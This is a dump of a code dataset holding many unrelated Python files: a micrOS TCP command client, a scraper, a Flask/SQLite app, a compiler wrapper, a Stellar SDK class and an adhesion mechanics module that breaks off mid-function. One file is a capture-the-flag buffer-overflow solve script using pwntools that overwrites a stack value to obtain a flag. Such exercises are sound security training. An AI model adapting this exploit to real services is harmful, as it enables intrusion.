id
stringlengths
1
265
text
stringlengths
6
5.19M
dataset_id
stringclasses
7 values
178966
import socket import select import re from Debug import errlog_add from ConfigHandler import cfgget from SocketServer import SocketServer class InterCon: CONN_MAP = {} def __init__(self): self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.conn.settimeout(4) @staticmethod def validate_ipv4(str_in): pattern = "^([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])$" if bool(re.match(pattern, str_in)): return True return False def send_cmd(self, host, port, cmd): hostname = None # Check IF host is hostname (example.local) and resolve it's IP address if not InterCon.validate_ipv4(host): hostname = host # Retrieve IP address by hostname dynamically if InterCon.CONN_MAP.get(hostname, None) is None: host = socket.getaddrinfo(host, port)[-1][4][0] else: # Restore IP from cache by hostname host = InterCon.CONN_MAP[hostname] # IF IP address is available send msg to the endpoint if InterCon.validate_ipv4(host): SocketServer().reply_message("[intercon] {} -> {}:{}:{}".format(cmd, hostname, host, port)) # Send command over TCP/IP self.conn.connect((host, port)) try: output = self.__run_command(cmd, hostname) except Exception as e: errlog_add("[intercon] send_cmd error: {}".format(e)) output = None self.conn.close() # Cache successful connection data (hostname:IP) if hostname is not None: # In case of valid communication store device ip, otherwise set ip to None InterCon.CONN_MAP[hostname] = None if output is None else host return output else: errlog_add("[intercon] Invalid host: {}".format(host)) return None def __run_command(self, cmd, hostname): cmd = str.encode(cmd) data, prompt = self.__receive_data() # Compare prompt |node01 $| with hostname 'node01.local' if hostname is None or prompt is None or str(prompt).replace('$', '').strip() == str(hostname).split('.')[0]: # Sun command on validated device self.conn.send(cmd) data, _ = self.__receive_data(prompt=prompt) if data == '\0': return None return data # Skip command run: prompt and host not the same! SocketServer().reply_message("[intercon] prompt mismatch, hostname: {} prompt: {} ".format(hostname, prompt)) return None def __receive_data(self, prompt=None): data = "" # Collect answer data if select.select([self.conn], [], [], 1)[0]: while True: last_data = self.conn.recv(512).decode('utf-8').strip() # First data is prompt, get it prompt = last_data.strip() if prompt is None else prompt data += last_data # Wait for prompt or special cases (conf,exit) if prompt in data.strip() or '[configure]' in data or "Bye!" in last_data: break data = data.replace(prompt, '') data = [k.strip() for k in data.split('\n')] return data, prompt # Main command to send msg to other micrOS boards def send_cmd(host, cmd): port = cfgget('socport') com_obj = InterCon() # send command output = com_obj.send_cmd(host, port, cmd) # send command retry if output is None: output = com_obj.send_cmd(host, port, cmd) return output # Dump connection cache def dump_cache(): return InterCon.CONN_MAP
StarcoderdataPython
3370939
<filename>mla/utils/__init__.py<gh_stars>1000+ # coding:utf-8 from .main import *
StarcoderdataPython
1773510
<filename>src/data/scraping/scrape_match_search_pages.py<gh_stars>0 from bs4 import BeautifulSoup as bs from os import listdir import codecs import pandas as pd import re path = "../../../data/external/search_pages/" search_pages = [] dfs = [] def get_match_compnent_ids(soup, search_string): links = soup.find_all(lambda tag:tag.name == "a" and search_string in tag.text) urls = [a['href'] for a in links] ids = [url.strip(".html").split('/')[-1] for url in urls] return ids for fn in listdir(path): print(f"Processing page {fn.strip('html').split('=')[-1]}", flush=True) filepath = path + fn html = codecs.open(filepath, 'r').read() soup = bs(html, 'html.parser') table_df = pd.read_html(str(soup.find_all("table", class_="engineTable")[1]))[0] table_df['Opposition'] = table_df['Opposition'].apply(lambda opp: opp[2:]) table_df.drop('Unnamed: 14', axis=1, inplace=True) table_df = table_df.assign(Team1Id = get_match_compnent_ids(soup, "Team home page"), Team2Id = get_match_compnent_ids(soup, "Opposition home page"), MatchId = get_match_compnent_ids(soup, "Match details"), PitchId = get_match_compnent_ids(soup, "Ground profile")) dfs.append(table_df) search_df = pd.concat(dfs, ignore_index=True, sort=False) search_df.to_csv("../../../data/external/" + 'raw_all_match_search_pages.csv')
StarcoderdataPython
3239953
<reponame>wrwrwr/turtle-trans """ Some common utilities. """ from turtle import Turtle def turtle_subclass(name): """ Creates a subclass of Turtle with the given name. """ return type(name, (Turtle,), {}) def translate_methods(cls, translations): """ Creates aliases for method names. """ for method, aliases in translations.items(): func = getattr(cls, method) for alias in aliases: setattr(cls, alias, func)
StarcoderdataPython
1720314
<filename>buffer_overflow_1/example_solve.py #!/usr/bin/env python import pwn import sys REMOTE_ADDR = "127.0.0.1" REMOTE_PORT = "1337" def get_challenge(): if pwn.args.REMOTE: return pwn.remote(REMOTE_ADDR, REMOTE_PORT) else: return pwn.process("./chal") chal = get_challenge() chal.sendline(pwn.cyclic(0x100)) chal.readlines(2) target_leak = chal.recvline() padding_len = pwn.cyclic_find(int(target_leak.strip().split()[-1])) chal.close() # perform the actual exploit chal = get_challenge() chal.sendline(b"A" * padding_len + pwn.p32(42)) chal.readlines(2) flag = chal.recvline().strip().split()[-1].decode() chal.close() print(f"Found the flag: {flag}")
StarcoderdataPython
4823633
import os, sys, atexit, signal, time, errno, psutil from .config import config def _daemonize(): try: pid = os.fork() if pid > 0: # exit first parent sys.exit(0) except OSError as e: sys.stderr.write('fork #1 failed: {} ({})\n'.format(e.errno, e.strerror)) sys.exit(1) # decouple from parent environment os.chdir('/') os.setsid() os.umask(0) # do second fork try: pid = os.fork() if pid > 0: # exit from second parent sys.exit(0) except OSError as e: sys.stderr.write('fork #2 failed: {} ({})\n'.format(e.errno, e.strerror)) sys.exit(1) # redirect standard file descriptors sys.stdout.flush() sys.stderr.flush() si = open('/dev/null', 'r') so = open('/dev/null', 'a+') se = open('/dev/null', 'a+') os.dup2(si.fileno(), sys.stdin.fileno()) os.dup2(so.fileno(), sys.stdout.fileno()) os.dup2(se.fileno(), sys.stderr.fileno()) # write pidfile atexit.register(_deletePID) pid = str(os.getpid()) open(getPIDFile(), 'w+').write('{}\n'.format(pid)) def _deletePID(): os.remove(getPIDFile()) def _isSameProcessName(pid): p1 = psutil.Process() p2 = psutil.Process(pid) if p1.name() == p2.name(): return True if p1.cmdline()[1] == p2.cmdline()[1]: return True if os.path.basename(p1.cmdline()[1]) == os.path.basename(p2.cmdline()[1]): return True return False def start(main): pid = getDaemonPID() if pid: try: os.kill(pid, 0) # process with pid is running, check if it's ours if _isSameProcessName(pid): sys.stderr.write('pidfile {} already exists\n'.format(getPIDFile())) sys.exit(1) else: sys.stderr.write('pidfile {} already exists but specified process is not ours\n'.format(getPIDFile())) except OSError as err: if err.errno == errno.ESRCH: # no such process sys.stderr.write('pidfile {} already exists but no running process was found\n'.format(getPIDFile())) else: print(err) sys.exit(1) # Start the daemon _daemonize() main() def stop(): pid = getDaemonPID() if not pid: sys.stderr.write('pidfile {} does not exist\n'.format(getPIDFile())) return # not an error in a restart try: os.kill(pid, 0) # process with pid is running, check if it's ours if _isSameProcessName(pid): try: while 1: os.kill(pid, signal.SIGTERM) time.sleep(0.1) except OSError as err: if err.errno == errno.ESRCH: # no such process, must have exited if os.path.exists(getPIDFile()): os.remove(getPIDFile()) else: print(err) sys.exit(1) else: sys.stderr.write('pidfile {} exists but specified process is not ours\n'.format(getPIDFile())) os.remove(getPIDFile()) sys.exit(1) except OSError as err: if err.errno == errno.ESRCH: # no such process sys.stderr.write('pidfile {} exists but specified process is not running\n'.format(getPIDFile())) os.remove(getPIDFile()) else: print(err) sys.exit(1) def restart(main): stop() start(main) def status(): pid = getDaemonPID() if pid: try: os.kill(pid, 0) # process with pid is running, check if it's ours if _isSameProcessName(pid): sys.stdout.write('Daemon is running with PID {}.\n'.format(pid)) else: sys.stderr.write('pidfile {} exists but specified process is not ours\n'.format(getPIDFile())) sys.exit(1) except OSError as err: if err.errno == errno.ESRCH: # no such process sys.stderr.write('pidfile {} exists but specified process is not running\n'.format(getPIDFile())) else: print(err) sys.exit(1) else: sys.stdout.write('Daemon is not running.\n') def getDaemonPID(): try: pf = open(getPIDFile(), 'r') pid = pf.read().strip() if pid: pid = int(pid) else: pid = None pf.close() except IOError: pid = None return pid def getPIDFile(): return config.getpath('server', 'pidFile')
StarcoderdataPython
3227789
<reponame>grnydawn/errand """Errand compiler module """ import os, sys, abc, re from errand.util import which, shellcmd class Compiler(abc.ABC): """Parent class for all compiler classes """ def __init__(self, path, flags): self.path = path self.flags = flags self.version = None def isavail(self): if self.version is None: self.set_version(self.get_version()) return (self.path is not None and os.path.isfile(self.path) and self.version is not None) def set_version(self, version): if version and self.check_version(version): self.version = version @abc.abstractmethod def get_option(self, **kwargs): linker = kwargs.pop("linker", True) opt = " ".join(self.flags) if self.flags else "" if linker is False: opt += " -c " return opt def get_version(self): ver = shellcmd("%s --version" % self.path).stdout.decode() return ver.strip() if ver else None @abc.abstractmethod def check_version(self, version): return False class Cpp_Compiler(Compiler): def __init__(self, path, flags): super(Cpp_Compiler, self).__init__(path, flags) class Fortran_Compiler(Compiler): def __init__(self, path, flags): super(Fortran_Compiler, self).__init__(path, flags) def get_option(self, **kwargs): opt = " " moddir = kwargs.pop("moddir", None) if moddir: opt = "-J %s " % moddir return opt + super(Fortran_Compiler, self).get_option(**kwargs) class AppleClang_Cpp_Compiler(Cpp_Compiler): libext = "dylib" def __init__(self, path, flags): if path is None: path = which("clang++") super(AppleClang_Cpp_Compiler, self).__init__(path, flags) def get_option(self, **kwargs): return "-dynamiclib -fPIC " + super(AppleClang_Cpp_Compiler, self).get_option(**kwargs) def check_version(self, version): return version.startswith("Apple clang version") class Gnu_Cpp_Compiler(Cpp_Compiler): def __init__(self, path, flags): if path is None: path = which("g++") super(Gnu_Cpp_Compiler, self).__init__(path, flags) def get_option(self, **kwargs): return "-shared -fPIC " + super(Gnu_Cpp_Compiler, self).get_option(**kwargs) def check_version(self, version): return version.startswith("g++ (GCC)") class AmdClang_Cpp_Compiler(Cpp_Compiler): def __init__(self, path, flags): if path is None: path = which("clang") super(AmdClang_Cpp_Compiler, self).__init__(path, flags) def get_option(self, **kwargs): return "-shared " + super(AmdClang_Cpp_Compiler, self).get_option(**kwargs) def check_version(self, version): return version.startswith("clang version") and "roc" in version class Pgi_Cpp_Compiler(Cpp_Compiler): def __init__(self, path, flags): if path is None: path = which("pgc++") super(Pgi_Cpp_Compiler, self).__init__(path, flags) def get_option(self, **kwargs): return "-shared " + super(Pgi_Cpp_Compiler, self).get_option(**kwargs) def check_version(self, version): return version.startswith("pgc++") and "PGI" in version class CrayClang_Cpp_Compiler(Cpp_Compiler): def __init__(self, path, flags): if path is None: path = which("CC") if path is None: path = which("clang++") if path is None: path = which("crayCC") super(CrayClang_Cpp_Compiler, self).__init__(path, flags) def get_option(self, **kwargs): return "-shared " + super(CrayClang_Cpp_Compiler, self).get_option(**kwargs) def check_version(self, version): return version.startswith("Cray clang version") class IbmXl_Cpp_Compiler(Cpp_Compiler): def __init__(self, path, flags): if path is None: path = which("xlc++") super(IbmXl_Cpp_Compiler, self).__init__(path, flags) def get_option(self, **kwargs): return "-shared " + super(IbmXl_Cpp_Compiler, self).get_option(**kwargs) def check_version(self, version): return version.startswith("IBM XL C/C++") class Pthread_Gnu_Cpp_Compiler(Gnu_Cpp_Compiler): def get_option(self, **kwargs): return "-pthread " + super(Pthread_Gnu_Cpp_Compiler, self).get_option(**kwargs) class Pthread_CrayClang_Cpp_Compiler(CrayClang_Cpp_Compiler): def get_option(self, **kwargs): return "-pthread " + super(Pthread_CrayClang_Cpp_Compiler, self).get_option(**kwargs) class Pthread_AmdClang_Cpp_Compiler(AmdClang_Cpp_Compiler): def get_option(self, **kwargs): return "-pthread " + super(Pthread_AmdClang_Cpp_Compiler, self).get_option(**kwargs) class Pthread_Pgi_Cpp_Compiler(Pgi_Cpp_Compiler): def get_option(self, **kwargs): return "-lpthread " + super(Pthread_Pgi_Cpp_Compiler, self).get_option(**kwargs) class Pthread_AppleClang_Cpp_Compiler(AppleClang_Cpp_Compiler): def get_option(self, **kwargs): return "-lpthread " + super(Pthread_AppleClang_Cpp_Compiler, self).get_option(**kwargs) class OpenAcc_Gnu_Cpp_Compiler(Pthread_Gnu_Cpp_Compiler): def __init__(self, path, flags): super(OpenAcc_Gnu_Cpp_Compiler, self).__init__(path, flags) def get_option(self, **kwargs): return ("-fopenacc " + super(OpenAcc_Gnu_Cpp_Compiler, self).get_option(**kwargs)) def check_version(self, version): pat = re.compile(r"(?P<major>\d+)\.(?P<minor>\d+)\.(?P<patch>\d)+") match = pat.search(version) if not match: return False return int(match.group("major")) >= 10 class OpenAcc_CrayClang_Cpp_Compiler(Pthread_CrayClang_Cpp_Compiler): def __init__(self, path, flags): super(OpenAcc_CrayClang_Cpp_Compiler, self).__init__(path, flags) def get_option(self, **kwargs): return ("-h pragma=acc " + super(OpenAcc_CrayClang_Cpp_Compiler, self).get_option(**kwargs)) class OpenAcc_Pgi_Cpp_Compiler(Pthread_Pgi_Cpp_Compiler): def __init__(self, path, flags): super(OpenAcc_Pgi_Cpp_Compiler, self).__init__(path, flags) def get_option(self, **kwargs): return ("-acc " + super(OpenAcc_Pgi_Cpp_Compiler, self).get_option(**kwargs)) class Cuda_Cpp_Compiler(Cpp_Compiler): def __init__(self, path, flags): if path is None: path = which("nvcc") super(Cuda_Cpp_Compiler, self).__init__(path, flags) def get_option(self, **kwargs): return ("--compiler-options '-fPIC' --shared " + super(Cuda_Cpp_Compiler, self).get_option(**kwargs)) def check_version(self, version): return version.startswith("nvcc: NVIDIA") class Hip_Cpp_Compiler(Cpp_Compiler): def __init__(self, path, flags): if path is None: path = which("hipcc") super(Hip_Cpp_Compiler, self).__init__(path, flags) def get_option(self, **kwargs): return ("-fPIC --shared " + super(Hip_Cpp_Compiler, self).get_option(**kwargs)) def check_version(self, version): return version.startswith("HIP version") class Gnu_Fortran_Compiler(Fortran_Compiler): def __init__(self, path, flags): if path is None: path = which("gfortran") super(Gnu_Fortran_Compiler, self).__init__(path, flags) def get_option(self, **kwargs): opt = " " return "-shared -fPIC " + opt + super(Gnu_Fortran_Compiler, self).get_option(**kwargs) def check_version(self, version): return version.startswith("GNU Fortran") class AmdFlang_Fortran_Compiler(Fortran_Compiler): def __init__(self, path, flags): if path is None: path = which("flang") super(AmdFlang_Fortran_Compiler, self).__init__(path, flags) def get_option(self, **kwargs): opt = " " return "-shared " + opt + super(AmdFlang_Fortran_Compiler, self).get_option(**kwargs) def check_version(self, version): return version.startswith("flang-new version") and "roc" in version class Cray_Fortran_Compiler(Fortran_Compiler): def __init__(self, path, flags): if path is None: path = which("ftn") if path is None: path = which("crayftn") super(Cray_Fortran_Compiler, self).__init__(path, flags) def get_option(self, **kwargs): opt = " " return "-shared " + opt + super(Cray_Fortran_Compiler, self).get_option(**kwargs) def check_version(self, version): return version.startswith("Cray Fortran") class AppleGnu_Fortran_Compiler(Gnu_Fortran_Compiler): libext = "dylib" def check_version(self, version): return sys.platform == "darwin" and super(AppleGnu_Fortran_Compiler, self).check_version(version) class IbmXl_Fortran_Compiler(Fortran_Compiler): def __init__(self, path, flags): if path is None: path = which("xlf2008_r") if path is None: path = which("xlf2008") if path is None: path = which("xlf2003_r") if path is None: path = which("xlf2003") if path is None: path = which("xlf95_r") if path is None: path = which("xlf95") if path is None: path = which("xlf90_r") if path is None: path = which("xlf90") super(IbmXl_Fortran_Compiler, self).__init__(path, flags) def get_version(self): ver = shellcmd("%s -qversion" % self.path).stdout.decode() return ver.strip() if ver else None def get_option(self, **kwargs): opt = " " moddir = kwargs.pop("moddir", None) if moddir: opt = "-qmoddir=%s " % moddir return "-qmkshrobj " + opt + super(IbmXl_Fortran_Compiler, self).get_option(**kwargs) def check_version(self, version): return version.startswith("IBM XL Fortran") class Pgi_Fortran_Compiler(Fortran_Compiler): def __init__(self, path, flags): if path is None: path = which("pgfortran") super(Pgi_Fortran_Compiler, self).__init__(path, flags) def get_option(self, **kwargs): opt = " " moddir = kwargs.pop("moddir", None) if moddir: opt = "-module %s " % moddir return "-shared -fpic " + opt + super(Pgi_Fortran_Compiler, self).get_option(**kwargs) def check_version(self, version): return version.startswith("pgfortran") and "PGI" in version class Compilers(object): def __init__(self, backend, compile): self.clist = [] clist = [] if backend in ("pthread", "c++"): clist = [Pthread_Gnu_Cpp_Compiler, Pthread_CrayClang_Cpp_Compiler, Pthread_AmdClang_Cpp_Compiler, Pthread_Pgi_Cpp_Compiler, Pthread_AppleClang_Cpp_Compiler] elif backend == "cuda": clist = [Cuda_Cpp_Compiler] elif backend == "hip": clist = [Hip_Cpp_Compiler] elif backend == "openacc-c++": clist = [OpenAcc_Gnu_Cpp_Compiler, OpenAcc_CrayClang_Cpp_Compiler, OpenAcc_Pgi_Cpp_Compiler] elif backend == "fortran": clist = [AmdFlang_Fortran_Compiler, Cray_Fortran_Compiler, Pgi_Fortran_Compiler, IbmXl_Fortran_Compiler, AppleGnu_Fortran_Compiler, Gnu_Fortran_Compiler] else: raise Exception("Compiler for '%s' is not supported." % backend) for cls in clist: try: if compile: path = which(compile[0]) if path: self.clist.append(cls(path, compile[1:])) else: self.clist.append(cls(None, None)) except Exception as err: pass def isavail(self): return self.select_one() is not None def select_one(self): for comp in self.clist: if comp.isavail(): return comp def select_many(self): comps = [] for comp in self.clist: if comp.isavail(): comps.append(comp) return comps
StarcoderdataPython
91211
<reponame>naritapandhe/Microsoft-Malware-Classification-Challenge from pyspark.sql import SparkSession from pyspark.mllib.linalg import SparseVector, VectorUDT, Vectors from pyspark.sql.types import * from pyspark.ml.classification import RandomForestClassifier from pyspark.ml.evaluation import MulticlassClassificationEvaluator #initialize spark session spark = SparkSession\ .builder\ .appName("Test")\ .config('spark.sql.warehouse.dir', 'file:///C:/')\ .getOrCreate() sc = spark.sparkContext #load data train = spark.read.load("./data/train_small.parquet") test = spark.read.load("./data/test_small.parquet") #rf classifier rf = RandomForestClassifier(numTrees=100,maxDepth=8,seed=42) model = rf.fit(train) result = model.transform(test) print result.show() #get accuracy predictionAndLabels = result.select("prediction", "label") evaluator = MulticlassClassificationEvaluator(metricName="accuracy") print "Accuracy: " + str(evaluator.evaluate(predictionAndLabels))
StarcoderdataPython
109645
<reponame>febiponwin/Swift_mobile_Verification from flask import Flask, render_template, request import sqlite3 as sql import operation import image_mail app = Flask(__name__) @app.route('/') def home(): return render_template('home.html') @app.route('/enternew') def new_student(): return render_template('user.html') @app.route('/addrec',methods = ['POST', 'GET']) def addrec(): if request.method == 'POST': try: opt = operation.operation() cws = request.form['cws'] phone_no = request.form['phone_no'] phone_model = request.form['phone_model'] created_time , ids = opt.calculate_code(cws,phone_no,phone_model) with sql.connect("database.db") as con: cur = con.cursor() cur.execute("INSERT INTO user_info (cws_id,phone_no,phone_model,created_time,id,updated_time) VALUES (?,?,?,?,?,?)", (cws,phone_no,phone_model,created_time,ids,created_time) ) con.commit() msg = "Record successfully added" if opt.qr_code_png(ids,cws): msg = msg + " and QR code has been generated" print ("Sending mail to the user") # mailer.Mailer().send("<EMAIL>") # imageMailer.Mailer().messageBody("cws") image_mail.Mailer().send_message(cws) except: con.rollback() msg = "error in insert operation" finally: return render_template("result.html",msg = msg) con.close() @app.route('/validate_user') def validate_user(): return render_template('validate.html') @app.route('/update_user') def update_user(): return render_template('update.html') @app.route('/list') def list(): con = sql.connect("database.db") con.row_factory = sql.Row cur = con.cursor() cur.execute("select * from user_info") rows = cur.fetchall(); return render_template("list.html",rows = rows) @app.route('/validate',methods = ['POST', 'GET']) def validate(): if request.method == 'POST': ids = request.form['ids'] con = sql.connect("database.db") con.row_factory = sql.Row cur = con.cursor() cur.execute("select * from user_info where id = (?)",(ids,)) rows = cur.fetchall(); return render_template("validate_result.html", rows=rows) @app.route('/search',methods = ['POST', 'GET']) def search(): if request.method == 'POST': cws = request.form['cws'] con = sql.connect("database.db") con.row_factory = sql.Row cur = con.cursor() cur.execute("select * from user_info where cws_id = (?)",(cws,)) rows = cur.fetchall(); return render_template("search_result.html", rows=rows) @app.route('/update',methods = ['POST', 'GET']) def update(): if request.method == 'POST': try: opt = operation.operation() cws = request.form['cws'] phone_no = request.form['phone_no'] phone_model = request.form['phone_model'] created_time, ids = opt.calculate_code(cws, phone_no, phone_model) with sql.connect("database.db") as con: cur = con.cursor() cur.execute("UPDATE user_info SET phone_no = ?,phone_model = ?,id = ?, updated_time = ? where cws_id = ? ",(phone_no, phone_model, ids, created_time, cws)) con.commit() msg = "Record successfully updated" if opt.qr_code_png(ids, cws): msg = msg + " and QR code has been generated" print("Sending mail to the user") image_mail.Mailer().send_message(cws) except Exception as err: con.rollback() msg = "error in update operation "+str(err) finally: return render_template("result.html", msg=msg) con.close() if __name__ == '__main__': app.run(port=8080,debug = True)
StarcoderdataPython
1789236
<gh_stars>0 class Signal: def __init__(self) -> None: self._slots = [] def connect(self, slot): self._slots.append(slot) def remove_slot(self, slot): self._slots.remove(slot) def emit(self, *args, **kwargs): for slot in self._slots: slot(*args, **kwargs)
StarcoderdataPython
1628039
<filename>stellar_sdk/base_transaction_envelope.py from abc import abstractmethod from typing import Generic, List, TypeVar, Union from . import xdr as stellar_xdr from .decorated_signature import DecoratedSignature from .exceptions import SignatureExistError from .keypair import Keypair from .network import Network from .type_checked import type_checked from .utils import hex_to_bytes, sha256 T = TypeVar("T") @type_checked class BaseTransactionEnvelope(Generic[T]): def __init__( self, network_passphrase: str, signatures: List[DecoratedSignature] = None, ) -> None: self.network_passphrase: str = network_passphrase self.signatures: List[DecoratedSignature] = signatures or [] self._network_id: bytes = Network(network_passphrase).network_id() def hash(self) -> bytes: """Get the XDR Hash of the signature base. This hash is ultimately what is signed before transactions are sent over the network. See :meth:`signature_base` for more details about this process. :return: The XDR Hash of this transaction envelope's signature base. """ return sha256(self.signature_base()) def hash_hex(self) -> str: """Return a hex encoded hash for this transaction envelope. :return: A hex encoded hash for this transaction envelope. """ return self.hash().hex() def sign(self, signer: Union[Keypair, str]) -> None: """Sign this transaction envelope with a given keypair. Note that the signature must not already be in this instance's list of signatures. :param signer: The keypair or secret to use for signing this transaction envelope. :raise: :exc:`SignatureExistError <stellar_sdk.exception.SignatureExistError>`: if this signature already exists. """ if isinstance(signer, str): signer = Keypair.from_secret(signer) tx_hash = self.hash() sig = signer.sign_decorated(tx_hash) if sig in self.signatures: raise SignatureExistError("The keypair has already signed.") else: self.signatures.append(sig) @abstractmethod def signature_base(self) -> bytes: """Get the signature base of this transaction envelope. Return the "signature base" of this transaction, which is the value that, when hashed, should be signed to create a signature that validators on the Stellar Network will accept. It is composed of a 4 prefix bytes followed by the xdr-encoded form of this transaction. :return: The signature base of this transaction envelope. """ raise NotImplementedError("The method has not been implemented.") def sign_hashx(self, preimage: Union[bytes, str]) -> None: """Sign this transaction envelope with a Hash(x) signature. See Stellar's documentation on `Multi-Sig <https://developers.stellar.org/docs/glossary/multisig/>`_ for more details on Hash(x) signatures. :param preimage: Preimage of hash used as signer, byte hash or hex encoded string """ preimage_bytes: bytes = hex_to_bytes(preimage) hash_preimage = sha256(preimage_bytes) hint = hash_preimage[-4:] sig = DecoratedSignature(hint, preimage_bytes) if sig in self.signatures: raise SignatureExistError("The preimage has already signed.") else: self.signatures.append(sig) def to_xdr_object(self) -> stellar_xdr.TransactionEnvelope: """Get an XDR object representation of this :class:`BaseTransactionEnvelope`. :return: XDR TransactionEnvelope object """ raise NotImplementedError("The method has not been implemented.") def to_xdr(self) -> str: """Get the base64 encoded XDR string representing this :class:`BaseTransactionEnvelope`. :return: XDR TransactionEnvelope base64 string object """ return self.to_xdr_object().to_xdr() @classmethod def from_xdr_object( cls, xdr_object: stellar_xdr.TransactionEnvelope, network_passphrase: str ) -> T: """Create a new :class:`BaseTransactionEnvelope` from an XDR object. :param xdr_object: The XDR object that represents a transaction envelope. :param network_passphrase: The network to connect to for verifying and retrieving additional attributes from. :return: A new :class:`TransactionEnvelope` object from the given XDR TransactionEnvelope object. """ raise NotImplementedError("The method has not been implemented.") @classmethod def from_xdr(cls, xdr: str, network_passphrase: str) -> T: """Create a new :class:`BaseTransactionEnvelope` from an XDR string. :param xdr: The XDR string that represents a transaction envelope. :param network_passphrase: which network this transaction envelope is associated with. :return: A new :class:`BaseTransactionEnvelope` object from the given XDR TransactionEnvelope base64 string object. """ xdr_object = stellar_xdr.TransactionEnvelope.from_xdr(xdr) return cls.from_xdr_object(xdr_object, network_passphrase) @abstractmethod def __eq__(self, other: object) -> bool: pass # pragma: no cover def __str__(self): return ( f"<BaseTransactionEnvelope [network_passphrase={self.network_passphrase}, " f"signatures={self.signatures}]>" )
StarcoderdataPython
3367242
<reponame>pcaston/core """Errors for the Hue component.""" from openpeerpower.exceptions import OpenPeerPowerError class HueException(OpenPeerPowerError): """Base class for Hue exceptions.""" class CannotConnect(HueException): """Unable to connect to the bridge.""" class AuthenticationRequired(HueException): """Unknown error occurred."""
StarcoderdataPython
3372617
# # Copyright 2020 <NAME> # 2020 <NAME> # # ### MIT license # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # """ Defines the interface for Adhesion systems """ import numpy as np import Adhesion import ContactMechanics import SurfaceTopography from ContactMechanics.Tools import compare_containers from ContactMechanics.Systems import IncompatibleResolutionError, SystemBase class SmoothContactSystem(SystemBase): """ For smooth contact mechanics (i.e. the ones for which optimization is only kinda-hell """ def __init__(self, substrate, interaction, surface): """ Represents a contact problem Parameters ---------- substrate: An instance of HalfSpace. Defines the solid mechanics in the substrate interaction: Adhesion.Interactions.SoftWall Defines the contact formulation. If this computes interaction energies, forces etc, these are supposed to be expressed per unit area in whatever units you use. The conversion is performed by the system surface: SurfaceTopography.Topography Defines the profile. """ if surface.has_undefined_data: raise ValueError("The topography you provided contains undefined " "data") super().__init__(substrate=substrate, surface=surface) self.interaction = interaction if not compare_containers(surface.nb_grid_pts, substrate.nb_grid_pts): raise IncompatibleResolutionError( ("the substrate ({}) and the surface ({}) have incompatible " "nb_grid_ptss.").format( substrate.nb_grid_pts, surface.nb_grid_pts)) # nopep8 self.dim = len(self.substrate.nb_grid_pts) self.energy = None self.force = None self.force_h = None self.interaction_energy = None self.interaction_force = None self.heights_k = None self.engine = self.substrate.fftengine if hasattr(substrate.fftengine, "register_halfcomplex_field") and self.engine.communicator.size == 1: # avoids the initialization to fail if we use an fftengine without these hcffts implemnented # preconditionning is not parallelized yet, this we have no parallelized wrapper for hcfft in muFFT yet self.real_buffer = self.engine.register_halfcomplex_field("hc-real-space", 1) self.fourier_buffer = self.engine.register_halfcomplex_field("hc-fourier-space", 1) self.stiffness_k = self._compute_stiffness_k() @property def nb_grid_pts(self): return self.surface.nb_grid_pts @staticmethod def handles(substrate_type, interaction_type, surface_type, comm): is_ok = True # any periodic type of substrate formulation should do is_ok &= issubclass(substrate_type, ContactMechanics.Substrate) # only soft interactions allowed is_ok &= issubclass(interaction_type, Adhesion.SoftWall) # any surface should do is_ok &= issubclass(surface_type, SurfaceTopography.UniformTopographyInterface) return is_ok def compute_repulsive_force(self): "computes and returns the sum of all repulsive forces" return self.reduction.sum(np.where( self.interaction_force > 0, self.interaction_force, 0 )) def compute_attractive_force(self): "computes and returns the sum of all attractive forces" return self.reduction.sum(np.where( self.interaction_force < 0, self.interaction_force, 0 )) def _compute_stiffness_k(self): """ computes and returns the wavevectors q that exist for the surfaces physical_sizes and nb_grid_pts as one vector of components per dimension """ vectors = [] q = [] nb_dims = len(self.substrate.nb_grid_pts) # if nb_dims == 1: # nb_grid_pts = [self.substrate.nb_grid_pts] # physical_sizes = [self.substrate.physical_sizes] for dim in range(nb_dims): vectors.append(2 * np.pi * np.fft.fftfreq( self.substrate.nb_grid_pts[dim], self.substrate.physical_sizes[dim] / self.substrate.nb_grid_pts[dim])) if nb_dims == 1: q = vectors[0] q[0] = q[1] elif nb_dims == 2: qx = vectors[0] qy = vectors[1] q = np.sqrt( (qx * qx).reshape((-1, 1)) + (qy * qy).reshape((1, -1))) q[0, 0] = (q[0, 1] + q[1, 0]) / 2 return 0.5 * self.substrate.contact_modulus * abs(q) def compute_normal_force(self): "computes and returns the sum of all forces" return self.reduction.sum(self.interaction_force) def compute_repulsive_contact_area(self): "computes and returns the area where contact pressure is repulsive" return self.compute_nb_repulsive_pts() * self.area_per_pt def compute_attractive_contact_area(self): "computes and returns the are where contact pressure is attractive" return self.compute_nb_attractive_pts() * self.area_per_pt def compute_nb_contact_pts(self): """ compute and return the number of contact points. Note that this is of no physical interest, as it is a purely numerical artefact """ return self.reduction.sum( np.where(self.interaction_force != 0., 1., 0.)) def compute_nb_repulsive_pts(self): """ compute and return the number of contact points under repulsive pressure. Note that this is of no physical interest, as it is a purely numerical artefact """ return self.reduction.sum( np.where(self.interaction_force > 0., 1., 0.)) def compute_nb_attractive_pts(self): """ compute and return the number of contact points under attractive pressure. Note that this is of no physical interest, as it is a purely numerical artefact """ return self.reduction.sum( np.where(self.interaction_force < 0., 1., 0.)) def compute_repulsive_coordinates(self): 